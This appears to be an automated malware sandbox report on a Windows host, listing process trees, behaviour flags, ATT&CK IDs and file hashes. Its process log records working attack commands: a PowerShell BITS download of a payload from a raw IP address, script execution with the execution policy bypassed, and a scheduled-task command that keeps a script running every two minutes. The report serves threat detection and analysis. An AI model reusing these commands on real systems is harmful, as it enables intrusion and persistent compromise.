- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3224

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff971ec9758,0x7ff971ec9768,0x7ff971ec9778
2⤵
PID:116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1708 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:2
2⤵
PID:3192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1900 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:3496

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2196 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:3464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2792 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:1068

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2800 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:4912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:1404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:2520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4948 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:3064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=5092 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:4588

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2348 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4804

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4660 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:2436

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4676 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:3244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5344 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:1052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3024 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:4756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=5644 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:1180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4068 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:4904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=5976 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:1
2⤵
PID:932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5188 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
PID:5876

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5604 --field-trial-handle=1932,i,7949803221853579176,3960225556771321647,131072 /prefetch:8
2⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2072

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:684

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5112

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source "http://91.92.254.77:222/jj.jpg -Destination " C:\Users\Public\ben.zip
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-BitsTransfer -Source "http://91.92.254.77:222/jj.jpg -Destination " C:\Users\Public\ben.zip
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4312

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5424

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\ben\" -spe -an -ai#7zMap10449:68:7zEvent17021
1⤵
- Suspicious use of FindShellTrayWindow
PID:5244

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:940

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
PID:5888

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Admin\Downloads\ben\basta.js"
1⤵
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\Admin\Downloads\ben'
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5428

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\ben\basta.js"
2⤵
PID:5988

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\ben\basta.js
1⤵
- Opens file in notepad (likely ransom note)
PID:3216

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\ben\node.bat
1⤵
- Opens file in notepad (likely ransom note)
- Suspicious use of FindShellTrayWindow
PID:1796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Admin\Downloads\ben\in.ps1"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\Admin\Downloads\ben'
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4396

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command Set-Location -literalPath 'C:\Users\Public'
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:5924

C:\Windows\System32\CScript.exe
"C:\Windows\System32\CScript.exe" "C:\Users\Public\basta.js"
1⤵
- Checks computer location settings
PID:5248

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
2⤵
PID:3132

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\Users\Public\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:1836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\in.ps1"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:6016

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" "
1⤵
PID:3636

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\Users\Public\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1152

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\in.ps1"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:5548

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\run.bat" "
1⤵
PID:2796

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\run.ps1"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Public\get.ps1'"
1⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:2588

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\basta.js"
1⤵
- Checks computer location settings
PID:5560

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Public\node.bat" C:\Users\Public\"
2⤵
PID:2604

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PowerShell -Command "$tr = New-Object -ComObject Schedule.Service; $tr.Connect(); $ta = $tr.NewTask(0); $ta.RegistrationInfo.Description = 'Runs a script every 2 minutes'; $ta.Settings.Enabled = $true; $ta.Settings.DisallowStartIfOnBatteries = $false; $st = $ta.Triggers.Create(1); $st.StartBoundary = [DateTime]::Now.ToString('yyyy-MM-ddTHH:mm:ss'); $st.Repetition.Interval = 'PT2M'; $md = $ta.Actions.Create(0); $md.Path = 'C:\Users\Public\app.js'; $ns = $tr.GetFolder('\'); $ns.RegisterTaskDefinition('BTime', $ta, 6, $null, $null, 3);"
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4852

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\in.ps1"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Public\get.ps1"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4328

C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe" "C:\Users\Public\in.ps1"
1⤵
- Suspicious behavior: EnumeratesProcesses
PID:5480

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
Filesize
194KB

MD5
f5b4137b040ec6bd884feee514f7c176

SHA1
7897677377a9ced759be35a66fdee34b391ab0ff

SHA256
845aa24ba38524f33f097b0d9bae7d9112b01fa35c443be5ec1f7b0da23513e6

SHA512
813b764a5650e4e3d1574172dd5d6a26f72c0ba5c8af7b0d676c62bc1b245e4563952bf33663bffc02089127b76a67f9977b0a8f18eaef22d9b4aa3abaaa7c40

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
1KB

MD5
7053df137fe059c29b37d130ae582d70

SHA1
7c883dd34e6e98a1a92e929a370cfc78828d3f3a

SHA256
32ead742564c3b2304a978a3b869a58e839a2291ed897c120781a5f7c5b19f2e

SHA512
d16216b7ebb4ae8201e599fbe38b9df03fe0c503e995df6312bfac26cfc392e778d775a55fdc63668fe573102389f2841471d013f2bda64708c261fdacb415bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize
148KB

MD5
73a578f6d9df2cc985e9e4d2d7a30745

SHA1
d41f5b8105a198be1a9bb838d54650af68bd0c95

SHA256
727f2d4417b846b8fd9b76d6a4215670ddbd21d5527a04ca025e073c1ce5d08f

SHA512
4acc507716a9672196aa4cd955aef5a4fe93eeee954450310d506bdf135ddae6b9be95cbe7b0f57fbe3ce4ae47d87cea9c3920727abc20541c60e9e6a2ec52c7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Filesize
20KB

MD5
9e6dd8932193f0e06d28edafd4309144

SHA1
54b306f59a71addd08fda56ac811d605d14a3970

SHA256
3db555333f46b03affa9232fe6c29665f2755b16f4be1345d10b23a60615d8b3

SHA512
b6ee7ded81b1d3beb7bff00aea9c0c68e8e1a22c87e7f27f5c00559c9f975b0150d3087d834b4fc0b0e21dafd2b64f54a99b64cb3b3746f02235d4f889c91f79

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
3b2d7be1b43de4935fc1a4980cdd674f

SHA1
bafb4b08bb0cf184be9ec67141f3c8e918ffd41d

SHA256
0e020899b6f9a572d98aa971955c75871da8ad00cc227b066bb8ba59f023f945

SHA512
0df504bea068d331024da3a7fdb294e209a4f104dc70e40c5f4669558d86f9e3fa3f6ac277e5371748023d97e6ee2e2c1602420ff135867c517a35cba4deb2dd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
bb52864ccb722db0d530b57cfb58c9dd

SHA1
7ae771f513fc3ede5a68e934d55041190b8316d1

SHA256
1cdd6d13156833dff7a44a438d2c353bef0cf8fed333cf05776191921373d966

SHA512
e07485bc55318ba12c5abdc9eeb42358a5a33fb6de61a4a3994363c5dcbdfeaaad2de376287b476a06350933b6d751202dde625236512d1074d9c6e621a6c0f1

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
264afab1d49e6711426f42d8bc1fefc6

SHA1
44a883f40cb97a71b7484f6daa3ac363b32d2f5e

SHA256
127836f17e9312f04ec4b6a95e2a968dc97edd245c66ff51061a8abdca897738

SHA512
6fb5aa18377a10b0033cb146852ac4b7b87ddd151ade49de0f6b3ce68cf0d0b9229143cb9fff1c08933a48c442bb1ed3fb1ade8ec1c5cbe97c1e6cc800e4f176

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
3KB

MD5
d29ac6d2f0e99a5dcba0796f123d646e

SHA1
cab8b8ef63676e06e88d62905796a2911f724593

SHA256
4d87879fc6570e951e51333867ef48e49ac38254f698b2a804b3c69d30877256

SHA512
e76ca337ecb6190ebd218ed7d29568da1b4f285147531a24807acf8f8675beef1182001f92f397886ed6cd3e2f4f8fa307cf78b9807eb5fbcbcfa3c1250ad93c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
873B

MD5
1f82ed773eebd7f2c6bef2887171bca5

SHA1
c898517ea4b5f41be769e899d9316b30633b9434

SHA256
1d924feedc92f971ef7be4bb06068cb7742fb109955499175e6eb183915e43ba

SHA512
a1fe9ce0cdca0d572943936077ddb4d74a67e0418be413e52f31223e8796c8f68b559e147d80d7936b3fabbdbe484828ea815511da1128dca91b8926a275d98a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
dcb3e32620b5b98a9622090817d51e1c

SHA1
dad4fb00ffe7ba2831e7ffb13b0685a1fe28b751

SHA256
a630161c272e154e741c015a0380f652dfbc5ff15d8cdec289e30ce236c0bb2c

SHA512
ce3a4a7726c7aedab9f488b067304296a1e8ae4a1b2d783c2eb909205bea026407123f84e6c24a42ced87af90cb9935e4b1c3bb073b36edf63a101aed2b86862

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
d204f26e8ede8ac66a142938b4ddc549

SHA1
2e755edddc915f75e43f4764bb2c30c7c5f37056

SHA256
685be8f699392ae975006f8eb16bb880c7069b9a7fcc2c0d8483a03ca9c0d06a

SHA512
5f0242d10f0e8eb97e84049b6ef3519af35bbeff57b4ea77fabb0cadd0ce6afff42c1078fc6a4edc48fcbf84a6468db2f8e9e163e52ff2ecd91085b3901089f9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
43609d7ee537b42ac85765a28d039b9b

SHA1
8e642bea1ebabe57b849c96bd83a4dba3afab659

SHA256
87fe4250327121ab315da99e7c9d68eee4959b86aaab103bbfcf93aa179d2223

SHA512
8801d2cc59d7cd51cf801739f4dc67a94299deae8e5fd1e89cd2d118a24ae22615d011d895b85f15de51040cd2c1bf3c984704418361f8ad1d3e4e9a0299fe68

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
be7508cd9b6654479d628a60bce2399e

SHA1
c8ecfc26c574479e5bc96603e86c0f2e853c14cb

SHA256
4ac330e8e5e2676b505a732cffe16e4279aa5ce1b2a5de8b0ced498311c7981f

SHA512
f135d13a070d2f633db41603a766586a0addd1fc3c5fc15fa92dd12866d890a6aeb32c12641b552b984a2b53ba298d359cee0ede0a2321844a53b2a6d9c2f0f6

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
54adb4b03534701ae358644cf71401ef

SHA1
5463fafa43e7b0c7803aadf7c0c8cde6a8f8e40f

SHA256
3dee951cbb65b14aa9da93da89109743460416a4545296ea980acad7e238c3d5

SHA512
94d2ceb44ac03682f23e0bc08625af2c30eafcc0511a46a85b43102cc8ba379a8af94291d6485c60589b06acfdaf9db40cceba659018630e9f3269a3904fc99d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
ac11a001e29a4554f1b7de2530f5e788

SHA1
38b510af14ce450bcbbfce19b37273da7ceee12b

SHA256
d6c36a3f925ea444dc218a8e4279e7ac0f9bb424c4110661f42c22ea7faf5300

SHA512
238e1f060fd4740e314137f47f2557fff40b051512f11712031b4803a32f7d2ea22340a9390aeed0a6b27905d36b9ce301b2d59dd7003b7d960695ee18efe437

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
6KB

MD5
3914a76f935323a63337b60a1647e6dc

SHA1
d5fac81571352fc937cb4443040e538575fc45c3

SHA256
3108fa78120cbe6b721a18ead04fa554b67a6bcbf7311fbc0ea7d4932be3498c

SHA512
b8024984da1962139349a68f08b43a3a7eb49fb4d4f13f56a0d67a98f289ad5c159fb6ffbb91763d8997f19763afed3efb278af28027526989ef7a45ca44d0c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
024cc6b58b64058411057cd2b22b4928

SHA1
a89509454e156c656fb68e08b47937fe594ab78b

SHA256
66e1c06f74b65b14d76f7cd8e9df0413aa621d1d89ed0a6b2226c7eb4a2b2958

SHA512
e3205b9dce8011e9cae3c9b52e39457831850f49752077d7f68fe74deca2d6ced17644067352347f8d88f450ead5c8527cf79942ed6ba6cee33c4d940e728625

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
72B

MD5
aad050a968369bfdac7c51301f299781

SHA1
fe00ca1f80729dfe426c97f1cd7405093376272a

SHA256
8deba82d83737a5fa9461e4ae983a584d683f0ec43b6c97b39ce48bc90f7dac5

SHA512
d929b6b11a5061822f47c494dfeea1f7640d58e870aaf675e0c2e47115fd916bd9e9c76537b1abb1289c0259e72ef8e61ecaeaef9044a012673b376f4f7cd971

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe5b0f9c.TMP
Filesize
48B

MD5
4b02b3a5d4311c5791d8f45844f2a273

SHA1
98e9ede3eafc27273e9472626dc68d51184d1f3d

SHA256
b3231f12665f898481896764332143b51308936b2ecba40c7fc20d338a1cf5fc

SHA512
41d390fd37cf220121d0121c9ad83316c72ac4ea153a00f28b9d1d99cffebb0f6d422518795aae9afd39d9b1b3f715c2fad4fa4b6211bc389d1df454c22c11a2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Data
Filesize
92KB

MD5
2aa302b0dd670528ff3c168c0f334fe0

SHA1
32efd9062a358f1d115c8127c66ff59de74cd228

SHA256
ac21b5666bbbf2ac13bd66ebb58ae9f7261626963ba107eac3145cb09bcfc47b

SHA512
c6dbbd6c923eeeab1ddd75d585d460f936ffdbf27424545a1dc4b4f0e96b2195c9f61b3a3a0190ca2c841ebabca18a64bf95952d2cdb843bd17d8f4fd5f5c2df

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
128KB

MD5
b3e48e75b21474c9c40fb91f2b2b1c98

SHA1
9222d092f08f7fe64292e13ebec79666260f5ad1

SHA256
77378d423769508656cbe732da0fe0557bb5ffb5444b39f0f73d0c01c1790a03

SHA512
c7a2d3ccc20b676105f782f230958109d6c84ba4578dd32a86e84413eec698477da5773bf0851e1c4e7f2384659a0efc4ab503d7a2c7ab18ba0a23d4267bb941

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
128KB

MD5
38d49cc818186effac8c7c0f2e1eb759

SHA1
cf2616ef6812049775e622afb1343f245d1188e9

SHA256
23e8c04201f944881f0a3ffab6a11815790e6ffd6edbf0713b926bc76998c465

SHA512
f98e40b8fe0cdf6582d6f69d2009255a17cb1d3244286dc529c065db6f3bde0e1abed4a8193fd354302593300e9020b032e702527adaca8c1dd32bd3bc982dda

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
97KB

MD5
7a950068442c497c7d7cf29e86b2b2de

SHA1
c590d7945740f21fb60177d6237d5d54ebfbebe7

SHA256
cb8050aec3591e7fdba3d0f8e301dc95db2df6b6c5d6c06d64bb2ffad42fa791

SHA512
2b91198341e1eeee6c87e513b7f0bc7632ed5eb0608f68fa86ab4f889a98e6a12fb279334d245aa52c5fb24a70d85c829fe130fa2199168b551b413c09d6f584

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
106KB

MD5
9e7e20b6b098a88ebdb679cc1fb60e37

SHA1
135d4347a28275dd1769155ffbc2378596aa04b4

SHA256
ad803f6881e2a2c4ea35ae74ee25e7fb452656dddddfc6626e82df35a5cf86d3

SHA512
229dc5fd9ec5ae1356a88cd37a8e6045962852b40813f6ec1f6dacd489858ceb2e03af6c542af7356d01827219e859db054286ebb0fdee233fb823d477052e22

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
